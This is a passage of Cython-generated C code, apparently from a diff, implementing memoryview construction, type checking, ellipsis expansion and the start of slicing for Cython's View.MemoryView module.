__Pyx_AddTraceback("View.MemoryView.memoryview.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":662 + * + * @cname('__pyx_memoryview_new') + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): # <<<<<<<<<<<<<< + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo + */ + +static PyObject *__pyx_memoryview_new(PyObject *__pyx_v_o, int __pyx_v_flags, int __pyx_v_dtype_is_object, __Pyx_TypeInfo *__pyx_v_typeinfo) { + struct __pyx_memoryview_obj *__pyx_v_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_cwrapper", 0); + + /* "View.MemoryView":663 + * @cname('__pyx_memoryview_new') + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): + * cdef memoryview result = memoryview(o, flags, dtype_is_object) # <<<<<<<<<<<<<< + * result.typeinfo = typeinfo + * return result + */ + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_flags); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_v_dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_v_o); + __Pyx_GIVEREF(__pyx_v_o); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_o); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_Call(((PyObject *)__pyx_memoryview_type), __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_result = ((struct __pyx_memoryview_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":664 + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo # <<<<<<<<<<<<<< + * return result + * + */ + __pyx_v_result->typeinfo = __pyx_v_typeinfo; + + /* "View.MemoryView":665 + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo + * return result # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_check') + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = ((PyObject *)__pyx_v_result); + goto __pyx_L0; + + /* "View.MemoryView":662 + * + * @cname('__pyx_memoryview_new') + * cdef memoryview_cwrapper(object o, int flags, bint dtype_is_object, __Pyx_TypeInfo *typeinfo): # <<<<<<<<<<<<<< + * cdef memoryview result = memoryview(o, flags, dtype_is_object) + * result.typeinfo = typeinfo + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview_cwrapper", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":668 + * + * @cname('__pyx_memoryview_check') + * cdef inline bint memoryview_check(object o) noexcept: # <<<<<<<<<<<<<< + * return isinstance(o, memoryview) + * + */ + +static CYTHON_INLINE int __pyx_memoryview_check(PyObject *__pyx_v_o) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("memoryview_check", 0); + + /* "View.MemoryView":669 + * @cname('__pyx_memoryview_check') + * cdef inline bint memoryview_check(object o) noexcept: + * return isinstance(o, memoryview) # <<<<<<<<<<<<<< + * + * cdef tuple _unellipsify(object index, int ndim): + */ + __pyx_t_1 = __Pyx_TypeCheck(__pyx_v_o, __pyx_memoryview_type); + __pyx_r = __pyx_t_1; + goto __pyx_L0; + + /* "View.MemoryView":668 + * + * @cname('__pyx_memoryview_check') + * cdef inline bint memoryview_check(object o) noexcept: # <<<<<<<<<<<<<< + * return isinstance(o, memoryview) + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":671 + * return isinstance(o, memoryview) + * + * cdef tuple _unellipsify(object index, int ndim): # <<<<<<<<<<<<<< + * """ + * Replace all ellipses with full slices and fill incomplete indices with + */ + +static PyObject *_unellipsify(PyObject *__pyx_v_index, int __pyx_v_ndim) { + Py_ssize_t __pyx_v_idx; + PyObject *__pyx_v_tup = NULL; + PyObject *__pyx_v_result = NULL; + int __pyx_v_have_slices; + int __pyx_v_seen_ellipsis; + PyObject *__pyx_v_item = NULL; + Py_ssize_t __pyx_v_nslices; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + Py_ssize_t __pyx_t_4; + Py_ssize_t __pyx_t_5; + Py_UCS4 __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_unellipsify", 0); + + /* "View.MemoryView":677 + * """ + * cdef Py_ssize_t idx + * tup = index if isinstance(index, tuple) else (index,) # <<<<<<<<<<<<<< + * + * result = [slice(None)] * ndim + */ + __pyx_t_2 = PyTuple_Check(__pyx_v_index); + if (__pyx_t_2) { + __Pyx_INCREF(((PyObject*)__pyx_v_index)); + __pyx_t_1 = __pyx_v_index; + } else { + __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 677, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_v_index); + __Pyx_GIVEREF(__pyx_v_index); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_index); + __pyx_t_1 = __pyx_t_3; + __pyx_t_3 = 0; + } + __pyx_v_tup = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":679 + * tup = index if isinstance(index, tuple) else (index,) + * + * result = [slice(None)] * ndim # <<<<<<<<<<<<<< + * have_slices = False + * seen_ellipsis = False + */ + __pyx_t_1 = PyList_New(1 * ((__pyx_v_ndim<0) ? 0:__pyx_v_ndim)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 679, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + { Py_ssize_t __pyx_temp; + for (__pyx_temp=0; __pyx_temp < __pyx_v_ndim; __pyx_temp++) { + __Pyx_INCREF(__pyx_slice__5); + __Pyx_GIVEREF(__pyx_slice__5); + PyList_SET_ITEM(__pyx_t_1, __pyx_temp, __pyx_slice__5); + } + } + __pyx_v_result = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":680 + * + * result = [slice(None)] * ndim + * have_slices = False # <<<<<<<<<<<<<< + * seen_ellipsis = False + * idx = 0 + */ + __pyx_v_have_slices = 0; + + /* "View.MemoryView":681 + * result = [slice(None)] * ndim + * have_slices = False + * seen_ellipsis = False # <<<<<<<<<<<<<< + * idx = 0 + * for item in tup: + */ + __pyx_v_seen_ellipsis = 0; + + /* "View.MemoryView":682 + * have_slices = False + * seen_ellipsis = False + * idx = 0 # <<<<<<<<<<<<<< + * for item in tup: + * if item is Ellipsis: + */ + __pyx_v_idx = 0; + + /* "View.MemoryView":683 + * seen_ellipsis = False + * idx = 0 + * for item in tup: # <<<<<<<<<<<<<< + * if item is Ellipsis: + * if not seen_ellipsis: + */ + if (unlikely(__pyx_v_tup == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not iterable"); + __PYX_ERR(1, 683, __pyx_L1_error) + } + __pyx_t_1 = __pyx_v_tup; __Pyx_INCREF(__pyx_t_1); __pyx_t_4 = 0; + for (;;) { + if (__pyx_t_4 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_3 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_4); __Pyx_INCREF(__pyx_t_3); __pyx_t_4++; if (unlikely((0 < 0))) __PYX_ERR(1, 683, __pyx_L1_error) + #else + __pyx_t_3 = PySequence_ITEM(__pyx_t_1, __pyx_t_4); __pyx_t_4++; if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 683, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + #endif + __Pyx_XDECREF_SET(__pyx_v_item, __pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":684 + * idx = 0 + * for item in tup: + * if item is Ellipsis: # <<<<<<<<<<<<<< + * if not seen_ellipsis: + * idx += ndim - len(tup) + */ + __pyx_t_2 = (__pyx_v_item == __pyx_builtin_Ellipsis); + if (__pyx_t_2) { + + /* "View.MemoryView":685 + * for item in tup: + * if item is Ellipsis: + * if not seen_ellipsis: # <<<<<<<<<<<<<< + * idx += ndim - len(tup) + * seen_ellipsis = True + */ + __pyx_t_2 = (!__pyx_v_seen_ellipsis); + if (__pyx_t_2) { + + /* "View.MemoryView":686 + * if item is Ellipsis: + * if not seen_ellipsis: + * idx += ndim - len(tup) # <<<<<<<<<<<<<< + * seen_ellipsis = True + * have_slices = True + */ + if (unlikely(__pyx_v_tup == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 686, __pyx_L1_error) + } + __pyx_t_5 = PyTuple_GET_SIZE(__pyx_v_tup); if (unlikely(__pyx_t_5 == ((Py_ssize_t)-1))) __PYX_ERR(1, 686, __pyx_L1_error) + __pyx_v_idx = (__pyx_v_idx + (__pyx_v_ndim - __pyx_t_5)); + + /* "View.MemoryView":687 + * if not seen_ellipsis: + * idx += ndim - len(tup) + * seen_ellipsis = True # <<<<<<<<<<<<<< + * have_slices = True + * else: + */ + __pyx_v_seen_ellipsis = 1; + + /* "View.MemoryView":685 + * for item in tup: + * if item is Ellipsis: + * if not seen_ellipsis: # <<<<<<<<<<<<<< + * idx += ndim - len(tup) + * seen_ellipsis = True + */ + } + + /* "View.MemoryView":688 + * idx += ndim - len(tup) + * seen_ellipsis = True + * have_slices = True # <<<<<<<<<<<<<< + * else: + * if isinstance(item, slice): + */ + __pyx_v_have_slices = 1; + + /* "View.MemoryView":684 + * idx = 0 + * for item in tup: + * if item is Ellipsis: # <<<<<<<<<<<<<< + * if not seen_ellipsis: + * idx += ndim - len(tup) + */ + goto __pyx_L5; + } + + /* "View.MemoryView":690 + * have_slices = True + * else: + * if isinstance(item, slice): # <<<<<<<<<<<<<< + * have_slices = True + * elif not PyIndex_Check(item): + */ + /*else*/ { + __pyx_t_2 = PySlice_Check(__pyx_v_item); + if (__pyx_t_2) { + + /* "View.MemoryView":691 + * else: + * if isinstance(item, slice): + * have_slices = True # <<<<<<<<<<<<<< + * elif not PyIndex_Check(item): + * raise TypeError, f"Cannot index with type '{type(item)}'" + */ + __pyx_v_have_slices = 1; + + /* "View.MemoryView":690 + * have_slices = True + * else: + * if isinstance(item, slice): # <<<<<<<<<<<<<< + * have_slices = True + * elif not PyIndex_Check(item): + */ + goto __pyx_L7; + } + + /* "View.MemoryView":692 + * if isinstance(item, slice): + * have_slices = True + * elif not PyIndex_Check(item): # <<<<<<<<<<<<<< + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item + */ + __pyx_t_2 = (!(PyIndex_Check(__pyx_v_item) != 0)); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":693 + * have_slices = True + * elif not PyIndex_Check(item): + * raise TypeError, f"Cannot index with type '{type(item)}'" # <<<<<<<<<<<<<< + * result[idx] = item + * idx += 1 + */ + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 693, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = 0; + __pyx_t_6 = 127; + __Pyx_INCREF(__pyx_kp_u_Cannot_index_with_type); + __pyx_t_5 += 24; + __Pyx_GIVEREF(__pyx_kp_u_Cannot_index_with_type); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_kp_u_Cannot_index_with_type); + __pyx_t_7 = __Pyx_PyObject_FormatSimple(((PyObject *)Py_TYPE(__pyx_v_item)), __pyx_empty_unicode); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 693, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_6 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_7) > __pyx_t_6) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_7) : __pyx_t_6; + __pyx_t_5 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_7); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_7); + __pyx_t_7 = 0; + __Pyx_INCREF(__pyx_kp_u__6); + __pyx_t_5 += 1; + __Pyx_GIVEREF(__pyx_kp_u__6); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_kp_u__6); + __pyx_t_7 = __Pyx_PyUnicode_Join(__pyx_t_3, 3, __pyx_t_5, __pyx_t_6); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 693, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_t_7, 0, 0); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __PYX_ERR(1, 693, __pyx_L1_error) + + /* "View.MemoryView":692 + * if isinstance(item, slice): + * have_slices = True + * elif not PyIndex_Check(item): # <<<<<<<<<<<<<< + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item + */ + } + __pyx_L7:; + + /* "View.MemoryView":694 + * elif not PyIndex_Check(item): + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item # <<<<<<<<<<<<<< + * idx += 1 + * + */ + if (unlikely((__Pyx_SetItemInt(__pyx_v_result, __pyx_v_idx, __pyx_v_item, Py_ssize_t, 1, PyInt_FromSsize_t, 1, 1, 1) < 0))) __PYX_ERR(1, 694, __pyx_L1_error) + } + __pyx_L5:; + + /* "View.MemoryView":695 + * raise TypeError, f"Cannot index with type '{type(item)}'" + * result[idx] = item + * idx += 1 # <<<<<<<<<<<<<< + * + * nslices = ndim - idx + */ + __pyx_v_idx = (__pyx_v_idx + 1); + + /* "View.MemoryView":683 + * seen_ellipsis = False + * idx = 0 + * for item in tup: # <<<<<<<<<<<<<< + * if item is Ellipsis: + * if not seen_ellipsis: + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "View.MemoryView":697 + * idx += 1 + * + * nslices = ndim - idx # <<<<<<<<<<<<<< + * return have_slices or nslices, tuple(result) + * + */ + __pyx_v_nslices = (__pyx_v_ndim - __pyx_v_idx); + + /* "View.MemoryView":698 + * + * nslices = ndim - idx + * return have_slices or nslices, tuple(result) # <<<<<<<<<<<<<< + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + */ + __Pyx_XDECREF(__pyx_r); + if (!__pyx_v_have_slices) { + } else { + __pyx_t_7 = __Pyx_PyBool_FromLong(__pyx_v_have_slices); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_1 = __pyx_t_7; + __pyx_t_7 = 0; + goto __pyx_L9_bool_binop_done; + } + __pyx_t_7 = PyInt_FromSsize_t(__pyx_v_nslices); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_1 = __pyx_t_7; + __pyx_t_7 = 0; + __pyx_L9_bool_binop_done:; + __pyx_t_7 = PyList_AsTuple(__pyx_v_result); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 698, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_7); + __pyx_t_1 = 0; + __pyx_t_7 = 0; + __pyx_r = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + goto __pyx_L0; + + /* "View.MemoryView":671 + * return isinstance(o, memoryview) + * + * cdef tuple _unellipsify(object index, int ndim): # <<<<<<<<<<<<<< + * """ + * Replace all ellipses with full slices and fill incomplete indices with + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("View.MemoryView._unellipsify", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_tup); + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XDECREF(__pyx_v_item); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":700 + * return have_slices or nslices, tuple(result) + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: # <<<<<<<<<<<<<< + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: + */ + +static int assert_direct_dimensions(Py_ssize_t *__pyx_v_suboffsets, int __pyx_v_ndim) { + Py_ssize_t __pyx_v_suboffset; + int __pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t *__pyx_t_1; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("assert_direct_dimensions", 0); + + /* "View.MemoryView":701 + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + * for suboffset in suboffsets[:ndim]: # <<<<<<<<<<<<<< + * if suboffset >= 0: + * raise ValueError, "Indirect dimensions not supported" + */ + __pyx_t_2 = (__pyx_v_suboffsets + __pyx_v_ndim); + for (__pyx_t_3 = __pyx_v_suboffsets; __pyx_t_3 < __pyx_t_2; __pyx_t_3++) { + __pyx_t_1 = __pyx_t_3; + __pyx_v_suboffset = (__pyx_t_1[0]); + + /* "View.MemoryView":702 + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * raise ValueError, "Indirect dimensions not supported" + * return 0 # return type just used as an error flag + */ + __pyx_t_4 = (__pyx_v_suboffset >= 0); + if (unlikely(__pyx_t_4)) { + + /* "View.MemoryView":703 + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: + * raise ValueError, "Indirect dimensions not supported" # <<<<<<<<<<<<<< + * return 0 # return type just used as an error flag + * + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Indirect_dimensions_not_supporte, 0, 0); + __PYX_ERR(1, 703, __pyx_L1_error) + + /* "View.MemoryView":702 + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * raise ValueError, "Indirect dimensions not supported" + * return 0 # return type just used as an error flag + */ + } + } + + /* "View.MemoryView":704 + * if suboffset >= 0: + * raise ValueError, "Indirect dimensions not supported" + * return 0 # return type just used as an error flag # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":700 + * return have_slices or nslices, tuple(result) + * + * cdef int assert_direct_dimensions(Py_ssize_t *suboffsets, int ndim) except -1: # <<<<<<<<<<<<<< + * for suboffset in suboffsets[:ndim]: + * if suboffset >= 0: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.assert_direct_dimensions", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":711 + * + * @cname('__pyx_memview_slice') + * cdef memoryview memview_slice(memoryview memview, object indices): # <<<<<<<<<<<<<< + * cdef int new_ndim = 0, suboffset_dim = -1, dim + * cdef bint negative_step + */ + +static struct __pyx_memoryview_obj *__pyx_memview_slice(struct __pyx_memoryview_obj *__pyx_v_memview, PyObject *__pyx_v_indices) { + int __pyx_v_new_ndim; + int __pyx_v_suboffset_dim; + int __pyx_v_dim; + __Pyx_memviewslice __pyx_v_src; + __Pyx_memviewslice __pyx_v_dst; + __Pyx_memviewslice *__pyx_v_p_src; + struct __pyx_memoryviewslice_obj *__pyx_v_memviewsliceobj = 0; + __Pyx_memviewslice *__pyx_v_p_dst; + int *__pyx_v_p_suboffset_dim; + Py_ssize_t __pyx_v_start; + Py_ssize_t __pyx_v_stop; + Py_ssize_t __pyx_v_step; + Py_ssize_t __pyx_v_cindex; + int __pyx_v_have_start; + int __pyx_v_have_stop; + int __pyx_v_have_step; + PyObject *__pyx_v_index = NULL; + struct __pyx_memoryview_obj *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + struct __pyx_memoryview_obj *__pyx_t_3; + char *__pyx_t_4; + int __pyx_t_5; + Py_ssize_t __pyx_t_6; + PyObject *(*__pyx_t_7)(PyObject *); + PyObject *__pyx_t_8 = NULL; + Py_ssize_t __pyx_t_9; + int __pyx_t_10; + Py_ssize_t __pyx_t_11; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memview_slice", 0); + + /* "View.MemoryView":712 + * @cname('__pyx_memview_slice') + * cdef memoryview memview_slice(memoryview memview, object indices): + * cdef int new_ndim = 0, suboffset_dim = -1, dim # <<<<<<<<<<<<<< + * cdef bint negative_step + * cdef __Pyx_memviewslice src, dst + */ + __pyx_v_new_ndim = 0; + __pyx_v_suboffset_dim = -1; + + /* "View.MemoryView":719 + * + * + * memset(&dst, 0, sizeof(dst)) # <<<<<<<<<<<<<< + * + * cdef _memoryviewslice memviewsliceobj + */ + (void)(memset((&__pyx_v_dst), 0, (sizeof(__pyx_v_dst)))); + + /* "View.MemoryView":723 + * cdef _memoryviewslice memviewsliceobj + * + * assert memview.view.ndim > 0 # <<<<<<<<<<<<<< + * + * if isinstance(memview, _memoryviewslice): + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = (__pyx_v_memview->view.ndim > 0); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(1, 723, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(1, 723, __pyx_L1_error) + #endif + + /* "View.MemoryView":725 + * assert memview.view.ndim > 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * memviewsliceobj = memview + * p_src = &memviewsliceobj.from_slice + */ + __pyx_t_1 = __Pyx_TypeCheck(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type); + if (__pyx_t_1) { + + /* "View.MemoryView":726 + * + * if isinstance(memview, _memoryviewslice): + * memviewsliceobj = memview # <<<<<<<<<<<<<< + * p_src = &memviewsliceobj.from_slice + * else: + */ + if (!(likely(((((PyObject *)__pyx_v_memview)) == Py_None) || likely(__Pyx_TypeTest(((PyObject *)__pyx_v_memview), __pyx_memoryviewslice_type))))) __PYX_ERR(1, 726, __pyx_L1_error) + __pyx_t_2 = ((PyObject *)__pyx_v_memview); + __Pyx_INCREF(__pyx_t_2); + __pyx_v_memviewsliceobj = ((struct __pyx_memoryviewslice_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":727 + * if isinstance(memview, _memoryviewslice): + * memviewsliceobj = memview + * p_src = &memviewsliceobj.from_slice # <<<<<<<<<<<<<< + * else: + * slice_copy(memview, &src) + */ + __pyx_v_p_src = (&__pyx_v_memviewsliceobj->from_slice); + + /* "View.MemoryView":725 + * assert memview.view.ndim > 0 + * + * if isinstance(memview, _memoryviewslice): # <<<<<<<<<<<<<< + * memviewsliceobj = memview + * p_src = &memviewsliceobj.from_slice + */ + goto __pyx_L3; + } + + /* "View.MemoryView":729 + * p_src = &memviewsliceobj.from_slice + * else: + * slice_copy(memview, &src) # <<<<<<<<<<<<<< + * p_src = &src + * + */ + /*else*/ { + __pyx_memoryview_slice_copy(__pyx_v_memview, (&__pyx_v_src)); + + /* "View.MemoryView":730 + * else: + * slice_copy(memview, &src) + * p_src = &src # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_p_src = (&__pyx_v_src); + } + __pyx_L3:; + + /* "View.MemoryView":736 + * + * + * dst.memview = p_src.memview # <<<<<<<<<<<<<< + * dst.data = p_src.data + * + */ + __pyx_t_3 = __pyx_v_p_src->memview; + __pyx_v_dst.memview = __pyx_t_3; + + /* "View.MemoryView":737 + * + * dst.memview = p_src.memview + * dst.data = p_src.data # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_4 = __pyx_v_p_src->data; + __pyx_v_dst.data = __pyx_t_4; + + /* "View.MemoryView":742 + * + * + * cdef __Pyx_memviewslice *p_dst = &dst # <<<<<<<<<<<<<< + * cdef int *p_suboffset_dim = &suboffset_dim + * cdef Py_ssize_t start, stop, step, cindex + */ + __pyx_v_p_dst = (&__pyx_v_dst); + + /* "View.MemoryView":743 + * + * cdef __Pyx_memviewslice *p_dst = &dst + * cdef int *p_suboffset_dim = &suboffset_dim # <<<<<<<<<<<<<< + * cdef Py_ssize_t start, stop, step, cindex + * cdef bint have_start, have_stop, have_step + */ + __pyx_v_p_suboffset_dim = (&__pyx_v_suboffset_dim); + + /* "View.MemoryView":747 + * cdef bint have_start, have_stop, have_step + * + * for dim, index in enumerate(indices): # <<<<<<<<<<<<<< + * if PyIndex_Check(index): + * cindex = index + */ + __pyx_t_5 = 0; + if (likely(PyList_CheckExact(__pyx_v_indices)) || PyTuple_CheckExact(__pyx_v_indices)) { + __pyx_t_2 = __pyx_v_indices; __Pyx_INCREF(__pyx_t_2); __pyx_t_6 = 0; + __pyx_t_7 = NULL; + } else { + __pyx_t_6 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_v_indices); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 747, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 747, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_7)) { + if (likely(PyList_CheckExact(__pyx_t_2))) { + if (__pyx_t_6 >= PyList_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_8 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_6); __Pyx_INCREF(__pyx_t_8); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(1, 747, __pyx_L1_error) + #else + __pyx_t_8 = PySequence_ITEM(__pyx_t_2, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 747, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + #endif + } else { + if (__pyx_t_6 >= PyTuple_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_8 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_6); __Pyx_INCREF(__pyx_t_8); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(1, 747, __pyx_L1_error) + #else + __pyx_t_8 = PySequence_ITEM(__pyx_t_2, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 747, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + #endif + } + } else { + __pyx_t_8 = __pyx_t_7(__pyx_t_2); + if (unlikely(!__pyx_t_8)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if 